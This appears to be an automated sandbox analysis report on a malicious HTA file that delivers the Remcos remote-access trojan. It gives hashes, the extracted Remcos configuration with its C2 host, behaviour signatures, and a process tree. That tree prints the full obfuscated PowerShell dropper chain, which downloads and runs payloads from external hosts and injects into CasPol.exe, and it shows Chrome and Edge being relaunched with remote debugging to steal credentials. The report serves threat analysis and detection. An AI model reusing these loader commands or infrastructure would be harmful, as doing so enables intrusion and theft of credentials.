Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-11-2024 15:46

General

  • Target

    seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta

  • Size

    178KB

  • MD5

    2d71e3e87e2ea2945dcc2571b74fdb43

  • SHA1

    a338df9a850b1c37528e1b517786285c216cf5e0

  • SHA256

    0557fb02097645b6ec955298be44333a49f07f61dbcfdce99a78038f1cd4c1d4

  • SHA512

    8e9fca6b445cbec531540059dac5e287cef1e1f53e0c1afde7480e9bba3a0e4f532f7637bbf0dc79c34d179c3524fdccfc87933b00abd117a0437c59807dbeab

  • SSDEEP

    96:4vCl177OuKTWYEuKTGuC/TVjn0vflihuKTfuKTNAnuKTUQ:4vCld7OTTbETT5C/TCqTTfTTNeTTUQ

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Extracted

Family

remcos

Botnet

RemoteHost

C2

nextnewupdationsforu.duckdns.org:14645

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-EC111K

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Uses browser remote debugging 2 TTPs 9 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4820
    • C:\Windows\SysWOW64\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe
      "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'JFFVICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNreXNEeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmeUF5YmEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRmZIaEgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRqYyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPbXF1aGx2bUJJKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAid2prT094RWxYIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNd3VyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRVTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk0LjE3MS4xMzgvMzI5L2NyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlbmdvb2QudElGIiwiJGVuVjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyIsMCwwKTtzdGFSVC1zbGVFcCgzKTtpRXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyI='+[chAr]34+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2144
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:620
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\quu11rda\quu11rda.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2916
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD707.tmp" "c:\Users\Admin\AppData\Local\Temp\quu11rda\CSCFA89B42DA298454FB2FDD956E6792C1.TMP"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3272
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS"
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:716
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzSE5pbWFnZVVybCA9IGI0Rmh0dHBzOi8vMTAxJysnNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1JysndyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNycrJzZhMDkwNGYgYjRGO3NITndlYkNsJysnaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cycrJ0hOaW1hZ2VCeXRlcyA9IHNITndlYkNsaWVudC5Eb3dubG8nKydhZERhdGEoc0hOaW1hZ2VVcmwpO3NITmltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHNITmltJysnYWdlQnl0ZXMpO3NITnN0YXJ0RmxhZyA9IGI0Rjw8QkFTRTY0X1NUQVJUPj5iNEY7c0hOZW5kRmxhZyA9ICcrJ2I0Rjw8QkFTRTY0X0VORD4+YjRGO3NITnN0YXJ0SW5kZXggPSBzSCcrJ05pbWFnZVRlJysneHQuSW5kZXhPZihzSE5zdGFydEZsYWcpO3NITmVuZEluZCcrJ2V4ID0gc0hOaW1hZ2VUZXh0LkluZGV4T2Yoc0hOZW5kRmxhZyk7c0hOc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNITmVuZEluZGV4IC1ndCBzSE5zdGFydCcrJ0luZGV4O3NITnN0JysnYXJ0SW5kZXggKz0gc0hOc3RhcnRGbGFnJysnLkxlbmd0aDtzSE5iYXNlJysnNjRMZW5ndGggPSBzSE5lbmRJbmRleCAtIHNITnN0YXJ0SW5kZXg7c0hOYmFzZTY0Q29tbWFuZCA9IHNITicrJ2knKydtYWdlVGV4dC5TdWJzdHJpbmcoc0hOc3RhcnRJbmRleCwgc0hOYmFzZTY0TGVuZ3RoKTtzSE5iYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzSE5iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgczdnIEZvckVhY2gtT2JqZWN0IHsgc0hOXyB9KVstMS4uLShzSE5iYXNlNjRDb21tYW5kLkxlbmd0aCldO3NITmNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTJysndHJpbmcoc0hOYmEnKydzZTY0UmV2ZXJzZWQpO3NITmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCcrJyhzSE5jb21tYW5kQnl0ZXMpO3NITnZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoYjRGVkFJYjRGKTtzSE52YWlNZXRob2QuSW52bycrJ2tlKHNITm51bGwsIEAoYjRGdHh0LkVEU1NSRi85MjMvODMxLjE3MS40OS4zMi8vOnB0dGhiNEYsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RmRlc2F0aXZhZG9iNCcrJ0YsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RkNhc1BvbCcrJ2I0RiwgYjRGZGVzYXRpdmFkb2I0RiwgYjRGZGVzYXRpdmFkb2InKyc0RixiNEZkZXNhdGl2YWQnKydvYjRGLGI0RmRlc2F0aXZhZG9iNEYsYjRGZGVzYXRpdmFkb2I0RixiNEZkZXNhdGl2YWRvYjRGLGI0RmRlc2F0aXZhZG9iJysnNEYsYjRGMWI0RixiNEZkZXNhdGl2YWRvYjRGKSk7JykuUkVwbGFDZSgnYjRGJyxbc1RySW5nXVtDSGFyXTM5KS5SRXBsYUNlKCdzSE4nLCckJykuUkVwbGFDZSgnczdnJywnfCcpIHwmICggJFBzaG9tZVs0XSskUFNIT21FWzMwXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4568
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F, b4Fdesativadob4'+'F, b4Fdesativadob4F, b4FCasPol'+'b4F, b4Fdesativadob4F, b4Fdesativadob'+'4F,b4Fdesativad'+'ob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob'+'4F,b4F1b4F,b4Fdesativadob4F));').REplaCe('b4F',[sTrIng][CHar]39).REplaCe('sHN','$').REplaCe('s7g','|') |& ( $Pshome[4]+$PSHOmE[30]+'X')"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4672
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
              6⤵
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:1816
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\utakqlvelklhdntogzgdfxmszf"
                7⤵
                  PID:5048
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\utakqlvelklhdntogzgdfxmszf"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2996
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\wnnuqegyzsdmfbhspktfqchjhumae"
                  7⤵
                    PID:4744
                  • C:\Program Files\Google\Chrome\Application\Chrome.exe
                    --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                    7⤵
                    • Uses browser remote debugging
                    • Enumerates system info in registry
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of WriteProcessMemory
                    PID:2092
                    • C:\Program Files\Google\Chrome\Application\Chrome.exe
                      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff88705cc40,0x7ff88705cc4c,0x7ff88705cc58
                      8⤵
                        PID:4436
                      • C:\Program Files\Google\Chrome\Application\Chrome.exe
                        "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1928,i,6026193250185191243,16756627471615696198,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1920 /prefetch:2
                        8⤵
                          PID:4876
                        • C:\Program Files\Google\Chrome\Application\Chrome.exe
                          "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2092,i,6026193250185191243,16756627471615696198,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2148 /prefetch:3
                          8⤵
                            PID:4964
                          • C:\Program Files\Google\Chrome\Application\Chrome.exe
                            "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2232,i,6026193250185191243,16756627471615696198,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2372 /prefetch:8
                            8⤵
                              PID:3152
                            • C:\Program Files\Google\Chrome\Application\Chrome.exe
                              "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3160,i,6026193250185191243,16756627471615696198,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3180 /prefetch:1
                              8⤵
                              • Uses browser remote debugging
                              PID:1820
                            • C:\Program Files\Google\Chrome\Application\Chrome.exe
                              "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3184,i,6026193250185191243,16756627471615696198,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3240 /prefetch:1
                              8⤵
                              • Uses browser remote debugging
                              PID:4176
                            • C:\Program Files\Google\Chrome\Application\Chrome.exe
                              "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4600,i,6026193250185191243,16756627471615696198,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4560 /prefetch:1
                              8⤵
                              • Uses browser remote debugging
                              PID:3784
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\wnnuqegyzsdmfbhspktfqchjhumae"
                            7⤵
                            • Accesses Microsoft Outlook accounts
                            • System Location Discovery: System Language Discovery
                            PID:3784
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\hptnrwqanavzqhewhvngtpbaiaejxayp"
                            7⤵
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4224
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                            7⤵
                            • Uses browser remote debugging
                            • Enumerates system info in registry
                            • Modifies registry class
                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                            • Suspicious use of FindShellTrayWindow
                            PID:2408
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff886f146f8,0x7ff886f14708,0x7ff886f14718
                              8⤵
                                PID:1996
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,14264976104566666969,7091627403183400518,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2264 /prefetch:2
                                8⤵
                                  PID:3736
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2184,14264976104566666969,7091627403183400518,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 /prefetch:3
                                  8⤵
                                    PID:2780
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2184,14264976104566666969,7091627403183400518,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2816 /prefetch:8
                                    8⤵
                                      PID:620
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2184,14264976104566666969,7091627403183400518,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1
                                      8⤵
                                      • Uses browser remote debugging
                                      PID:4856
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2184,14264976104566666969,7091627403183400518,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1
                                      8⤵
                                      • Uses browser remote debugging
                                      PID:1632
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2184,14264976104566666969,7091627403183400518,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:1
                                      8⤵
                                      • Uses browser remote debugging
                                      PID:5068
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2184,14264976104566666969,7091627403183400518,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3840 /prefetch:1
                                      8⤵
                                      • Uses browser remote debugging
                                      PID:1404
                      • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                        "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                        1⤵
                          PID:2452
                        • C:\Windows\System32\CompPkgSrv.exe
                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                          1⤵
                            PID:3976
                          • C:\Windows\System32\CompPkgSrv.exe
                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                            1⤵
                              PID:4860

                            Network

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pOWeRShelL.exe.log

                              Filesize

                              2KB

                              MD5

                              968cb9309758126772781b83adb8a28f

                              SHA1

                              8da30e71accf186b2ba11da1797cf67f8f78b47c

                              SHA256

                              92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

                              SHA512

                              4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                              Filesize

                              256B

                              MD5

                              b3c28fe1524058eafa8842bc67330c0a

                              SHA1

                              96f1b68d937fd1dfef3c9e6bfabfe3d4c0dc0378

                              SHA256

                              2b6b7f90dfdfcebe10a126b003ea8e297ab00d8c3ecd160fd739c85fb80f38fb

                              SHA512

                              fa0b9d4cc9d40e4f327d123670c876fc85affa46dfe2d2ac20c1528144aa533057f961eda830f398d9d1a9d6f471cfbab385c030b20a650a1a692d555db82aa7

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                              Filesize

                              17KB

                              MD5

                              9276cf9ab5d7c91a1caa3632fe9f7bf8

                              SHA1

                              7ebc035238451262b6bbcd6db25c8f6eea71001f

                              SHA256

                              2649b4000dbdd4dcd6769cb89e8f84b0da2a34a485690d88d2de9219a980eb2f

                              SHA512

                              d485b1099b2c727011d06792ece11c1f32d08a70557e8f91cf8114a9ba4907ccbbb8bec76a953739b02f16eaa48faa0b4c1c31919fb07218ecef6f31718edbe6

                            • C:\Users\Admin\AppData\Local\Temp\RESD707.tmp

                              Filesize

                              1KB

                              MD5

                              0da661090d961b9c8e19bd61c7e1ff82

                              SHA1

                              2cb998788567a07ed3882e673c843a05f8751d8d

                              SHA256

                              f1cb069b479253e95a8eed508162b256e381bf06105294131bc41ec8213544f4

                              SHA512

                              e8652f1af99598e32415b88fa4cfa2a353ce930d781d68d3fd0d95128ec7ca24dec669746fdba13706bb7207f5e6e3c4d3a8de2428db210bd108186f9fde648a
